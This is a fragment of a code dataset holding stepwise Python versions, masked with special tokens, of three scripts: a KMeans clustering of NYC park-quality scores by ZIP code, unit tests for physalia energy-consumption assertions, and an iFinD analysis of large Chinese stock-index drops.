zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo) == shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo, fc=zips['color'][ii],\n linewidth=0.2))\n ax[0].plot(yrs, vals[km.labels_ == tcluster].T, color='k', lw=0.1)\n ax[0].plot(yrs, km.cluster_centers_[tcluster], color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster, km.\n n_clusters), clobber=True)\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport geopandas as gp\nfrom sklearn.cluster import KMeans\nimport shapely\nfrom descartes import PolygonPatch\ndata = pd.read_csv(\n '/scratch/share/gdobler/parqa/output/Tables/ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv'\n )\nzips = gp.GeoDataFrame.from_file(\n '/scratch/share/gdobler/parqa/output/ShapeData/ZIPCODE_Modified_Final.shp')\ncols = ['F2{0:03}'.format(i) for i in range(4, 16)]\nvals = data[cols].values\nvals -= vals[:, np.newaxis].mean(-1)\nvals /= vals[:, np.newaxis].std(-1)\nkm = KMeans(n_clusters=5)\nkm.fit(vals)\nzips['cluster'] = np.zeros(len(zips), dtype=int) - 1\ndzips = [i for i in data.ZIPCODE]\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\nzips['color'] = np.zeros(len(zips), dtype=str)\nfor tcluster in range(km.n_clusters):\n print('tcluster = ' + str(tcluster))\n zips['color'][zips['cluster'] == tcluster] = 'red'\n zips['color'][zips['cluster'] != tcluster] = 'none'\n close('all')\n yrs = range(2004, 2016)\n fig, ax = plt.subplots(1, 2, figsize=[10, 5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26, -74.26 + 0.6])\n ax[1].set_ylim([40.4, 40.4 + 0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo) == shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo, fc=zips['color'][ii],\n linewidth=0.2))\n ax[0].plot(yrs, vals[km.labels_ == tcluster].T, color='k', lw=0.1)\n ax[0].plot(yrs, km.cluster_centers_[tcluster], color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster, km.\n n_clusters), clobber=True)\n",
"step-5": "import numpy as np\nimport pandas as pd\nimport geopandas as gp\nfrom sklearn.cluster import KMeans\nimport shapely\nfrom descartes import PolygonPatch\n\n\n# -- load the data\ndata = pd.read_csv('/scratch/share/gdobler/parqa/output/Tables/'\n 'ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv')\n\nzips = gp.GeoDataFrame.from_file('/scratch/share/gdobler/parqa/output/'\n 'ShapeData/ZIPCODE_Modified_Final.shp')\n\n# -- prepare the data\ncols = ['F2{0:03}'.format(i) for i in range(4,16)]\nvals = data[cols].values\nvals -=vals[:,np.newaxis].mean(-1)\nvals /=vals[:,np.newaxis].std(-1)\n\n# -- cluster\nkm = KMeans(n_clusters=5)\nkm.fit(vals)\n\n# -- assign clusters to zips\nzips['cluster'] = np.zeros(len(zips),dtype=int)-1\ndzips = [i for i in data.ZIPCODE]\n\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\n\n\n# -- assign color\nzips['color'] = np.zeros(len(zips),dtype=str)\nfor tcluster in range(km.n_clusters):\n print(\"tcluster = \" + str(tcluster))\n zips['color'][zips['cluster']==tcluster] = 'red'\n zips['color'][zips['cluster']!=tcluster] = 'none'\n\n # -- plot\n close('all')\n yrs = range(2004,2016)\n fig, ax = plt.subplots(1,2,figsize=[10,5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26,-74.26+0.6])\n ax[1].set_ylim([40.4,40.4+0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo)==shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo,fc=zips['color'][ii],\n linewidth=0.2))\n\n ax[0].plot(yrs,vals[km.labels_==tcluster].T,color='k',lw=0.1)\n ax[0].plot(yrs,km.cluster_centers_[tcluster],color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster,\n km.n_clusters),\n clobber=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TestAssert(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestAssert(unittest.TestCase):
<|reserved_special_token_0|>
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
<|reserved_special_token_1|>
"""Test Assert module."""
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
# pylint: disable=missing-docstring
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = "./test_asserts_db.csv"
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(
9, 1,
app_pkg='com.sample',
use_case='login'
)
sample_high_energy = create_random_sample(
12, 1,
app_pkg='com.sample',
use_case='login'
)
existing_sample_one = create_random_sample(
10, 1,
app_pkg='com.persisted',
use_case='login'
)
existing_sample_two = create_random_sample(
11, 1,
app_pkg='com.persisted',
use_case='logout'
)
for measurement in existing_sample_one+existing_sample_two:
measurement.persist()
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted"
)
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted", "login"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted", "login"
)
def test_top_percentile(self):
sample = create_random_sample(
11, 1,
app_pkg='com.sample',
use_case='login'
)
for i in range(100):
existing_sample = create_random_sample(
i, 1,
app_pkg=('com.persisted.{}'.format(i)),
use_case='login'
)
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
|
flexible
|
{
"blob_id": "eda1c1db5371f5171f0e1929e98d09e10fdcef24",
"index": 1677,
"step-1": "<mask token>\n\n\nclass TestAssert(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-2": "<mask token>\n\n\nclass TestAssert(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-3": "<mask token>\n\n\nclass TestAssert(unittest.TestCase):\n TEST_CSV_STORAGE = './test_asserts_db.csv'\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-4": "<mask token>\nimport unittest\nfrom physalia import asserts\nfrom physalia.fixtures.models import create_random_sample\nfrom physalia.models import Measurement\n\n\nclass TestAssert(unittest.TestCase):\n TEST_CSV_STORAGE = './test_asserts_db.csv'\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',\n use_case='login')\n sample_high_energy = create_random_sample(12, 1, app_pkg=\n 'com.sample', use_case='login')\n existing_sample_one = create_random_sample(10, 1, app_pkg=\n 'com.persisted', use_case='login')\n existing_sample_two = create_random_sample(11, 1, app_pkg=\n 'com.persisted', use_case='logout')\n for measurement in (existing_sample_one + existing_sample_two):\n measurement.persist()\n asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')\n asserts.consumption_lower_than_app(sample_low_energy,\n 'com.persisted', 'login')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted')\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(sample_high_energy,\n 'com.persisted', 'login')\n\n def test_top_percentile(self):\n sample = create_random_sample(11, 1, app_pkg='com.sample', use_case\n ='login')\n for i in range(100):\n existing_sample = create_random_sample(i, 1, app_pkg=\n 'com.persisted.{}'.format(i), use_case='login')\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-5": "\"\"\"Test Assert module.\"\"\"\n\nimport unittest\nfrom physalia import asserts\nfrom physalia.fixtures.models import create_random_sample\nfrom physalia.models import Measurement\n\n# pylint: disable=missing-docstring\n\nclass TestAssert(unittest.TestCase):\n TEST_CSV_STORAGE = \"./test_asserts_db.csv\"\n\n def setUp(self):\n Measurement.csv_storage = self.TEST_CSV_STORAGE\n self.addCleanup(Measurement.clear_database)\n\n def test_consumption_below(self):\n sample = create_random_sample(10, 1)\n asserts.consumption_below(sample, 11)\n with self.assertRaises(Exception):\n asserts.consumption_below(sample, 9)\n\n def test_consumption_lower_than_app(self):\n sample_low_energy = create_random_sample(\n 9, 1,\n app_pkg='com.sample',\n use_case='login'\n )\n sample_high_energy = create_random_sample(\n 12, 1,\n app_pkg='com.sample',\n use_case='login'\n )\n existing_sample_one = create_random_sample(\n 10, 1,\n app_pkg='com.persisted',\n use_case='login'\n )\n existing_sample_two = create_random_sample(\n 11, 1,\n app_pkg='com.persisted',\n use_case='logout'\n )\n\n for measurement in existing_sample_one+existing_sample_two:\n measurement.persist()\n\n asserts.consumption_lower_than_app(\n sample_low_energy, \"com.persisted\"\n )\n asserts.consumption_lower_than_app(\n sample_low_energy, \"com.persisted\", \"login\"\n )\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(\n sample_high_energy, \"com.persisted\"\n )\n with self.assertRaises(Exception):\n asserts.consumption_lower_than_app(\n sample_high_energy, \"com.persisted\", \"login\"\n )\n\n def test_top_percentile(self):\n sample = create_random_sample(\n 11, 1,\n app_pkg='com.sample',\n use_case='login'\n )\n for i in range(100):\n existing_sample = create_random_sample(\n i, 1,\n app_pkg=('com.persisted.{}'.format(i)),\n use_case='login'\n )\n for measurement in existing_sample:\n measurement.persist()\n asserts.top_percentile(sample, 12)\n with self.assertRaises(Exception):\n asserts.top_percentile(sample, 11)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import pandas as pd
from datetime import datetime
from iFinDPy import *
thsLogin = THS_iFinDLogin("iFind账号","iFind账号密码")
index_list = ['000001.SH','399001.SZ','399006.SZ']
result = pd.DataFrame()
today =datetime.today().strftime('%Y-%m-%d')
for index in index_list:
data_js = THS_DateSerial(index,'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index',';;;',\
'Days:Tradedays,Fill:Previous,Interval:D,block:history','2000-01-01',today,True)
data_df = THS_Trans2DataFrame(data_js)
data_df['close_chg'] = data_df['ths_close_price_index'] / data_df['ths_pre_close_index'] * 100 - 100
result_pd = data_df[(data_df['close_chg'] < -5)]
date_list = result_pd['time'].tolist()
print('{}收盘在-5%的交易日有{}'.format(index,str(date_list)))
for date in date_list:
date_after_1month = THS_DateOffset('SSE','dateType:1,period:D,offset:30,dateFormat:0,output:singledate',date)['tables']['time'][0]
date_after_3month = THS_DateOffset('SSE','dateType:1,period:D,offset:90,dateFormat:0,output:singledate',date)['tables']['time'][0]
date_after_1year = THS_DateOffset('SSE','dateType:1,period:D,offset:365,dateFormat:0,output:singledate',date)['tables']['time'][0]
if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'):
continue
index_close_date = THS_BasicData(index,'ths_close_price_index',date)['tables'][0]['table']['ths_close_price_index'][0]
index_close_date_after_1month = THS_BasicData(index,'ths_close_price_index',date_after_1month)['tables'][0]['table']['ths_close_price_index'][0]
index_close_date_after_3month = THS_BasicData(index,'ths_close_price_index',date_after_3month)['tables'][0]['table']['ths_close_price_index'][0]
index_close_date_after_1year = THS_BasicData(index,'ths_close_price_index',date_after_1year)['tables'][0]['table']['ths_close_price_index'][0]
result = result.append(pd.DataFrame([index,date,index_close_date,index_close_date_after_1month,index_close_date_after_3month,index_close_date_after_1year]).T)
result.columns = ['指数代码','大跌日','大跌日点数','一个月后点数','三个月后点数','一年后点数']
result = result.set_index('指数代码')
result['大跌一个月后涨跌幅'] = result['一个月后点数']/result['大跌日点数'] *100 -100
result['大跌三个月后涨跌幅'] = result['三个月后点数']/result['大跌日点数'] *100 -100
result['大跌一年后涨跌幅'] = result['一年后点数']/result['大跌日点数'] *100 -100
result
|
normal
|
{
"blob_id": "7f62af951b49c3d1796c2811527ceb30ca931632",
"index": 8607,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor index in index_list:\n data_js = THS_DateSerial(index,\n 'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index'\n , ';;;', 'Days:Tradedays,Fill:Previous,Interval:D,block:history',\n '2000-01-01', today, True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df[\n 'ths_pre_close_index'] * 100 - 100\n result_pd = data_df[data_df['close_chg'] < -5]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index, str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:30,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:90,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:365,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'\n ):\n continue\n index_close_date = THS_BasicData(index, 'ths_close_price_index', date)[\n 'tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,\n 'ths_close_price_index', date_after_1month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,\n 'ths_close_price_index', date_after_3month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,\n 'ths_close_price_index', date_after_1year)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n result = result.append(pd.DataFrame([index, date, index_close_date,\n index_close_date_after_1month, index_close_date_after_3month,\n index_close_date_after_1year]).T)\n<mask token>\nresult\n",
"step-3": "<mask token>\nthsLogin = THS_iFinDLogin('iFind账号', 'iFind账号密码')\nindex_list = ['000001.SH', '399001.SZ', '399006.SZ']\nresult = pd.DataFrame()\ntoday = datetime.today().strftime('%Y-%m-%d')\nfor index in index_list:\n data_js = THS_DateSerial(index,\n 'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index'\n , ';;;', 'Days:Tradedays,Fill:Previous,Interval:D,block:history',\n '2000-01-01', today, True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df[\n 'ths_pre_close_index'] * 100 - 100\n result_pd = data_df[data_df['close_chg'] < -5]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index, str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:30,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:90,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:365,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'\n ):\n continue\n index_close_date = THS_BasicData(index, 'ths_close_price_index', date)[\n 'tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,\n 'ths_close_price_index', date_after_1month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,\n 'ths_close_price_index', date_after_3month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,\n 'ths_close_price_index', date_after_1year)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n result = result.append(pd.DataFrame([index, date, index_close_date,\n index_close_date_after_1month, index_close_date_after_3month,\n index_close_date_after_1year]).T)\nresult.columns = ['指数代码', '大跌日', '大跌日点数', '一个月后点数', '三个月后点数', '一年后点数']\nresult = result.set_index('指数代码')\nresult['大跌一个月后涨跌幅'] = result['一个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌三个月后涨跌幅'] = result['三个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌一年后涨跌幅'] = result['一年后点数'] / result['大跌日点数'] * 100 - 100\nresult\n",
"step-4": "import pandas as pd\nfrom datetime import datetime\nfrom iFinDPy import *\nthsLogin = THS_iFinDLogin('iFind账号', 'iFind账号密码')\nindex_list = ['000001.SH', '399001.SZ', '399006.SZ']\nresult = pd.DataFrame()\ntoday = datetime.today().strftime('%Y-%m-%d')\nfor index in index_list:\n data_js = THS_DateSerial(index,\n 'ths_pre_close_index;ths_open_price_index;ths_close_price_index;ths_high_price_index'\n , ';;;', 'Days:Tradedays,Fill:Previous,Interval:D,block:history',\n '2000-01-01', today, True)\n data_df = THS_Trans2DataFrame(data_js)\n data_df['close_chg'] = data_df['ths_close_price_index'] / data_df[\n 'ths_pre_close_index'] * 100 - 100\n result_pd = data_df[data_df['close_chg'] < -5]\n date_list = result_pd['time'].tolist()\n print('{}收盘在-5%的交易日有{}'.format(index, str(date_list)))\n for date in date_list:\n date_after_1month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:30,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_3month = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:90,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n date_after_1year = THS_DateOffset('SSE',\n 'dateType:1,period:D,offset:365,dateFormat:0,output:singledate',\n date)['tables']['time'][0]\n if date > (datetime.today() + timedelta(days=-365)).strftime('%Y-%m-%d'\n ):\n continue\n index_close_date = THS_BasicData(index, 'ths_close_price_index', date)[\n 'tables'][0]['table']['ths_close_price_index'][0]\n index_close_date_after_1month = THS_BasicData(index,\n 'ths_close_price_index', date_after_1month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_3month = THS_BasicData(index,\n 'ths_close_price_index', date_after_3month)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n index_close_date_after_1year = THS_BasicData(index,\n 'ths_close_price_index', date_after_1year)['tables'][0]['table'][\n 'ths_close_price_index'][0]\n result = result.append(pd.DataFrame([index, date, index_close_date,\n index_close_date_after_1month, index_close_date_after_3month,\n index_close_date_after_1year]).T)\nresult.columns = ['指数代码', '大跌日', '大跌日点数', '一个月后点数', '三个月后点数', '一年后点数']\nresult = result.set_index('指数代码')\nresult['大跌一个月后涨跌幅'] = result['一个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌三个月后涨跌幅'] = result['三个月后点数'] / result['大跌日点数'] * 100 - 100\nresult['大跌一年后涨跌幅'] = result['一年后点数'] / result['大跌日点数'] * 100 - 100\nresult\n",
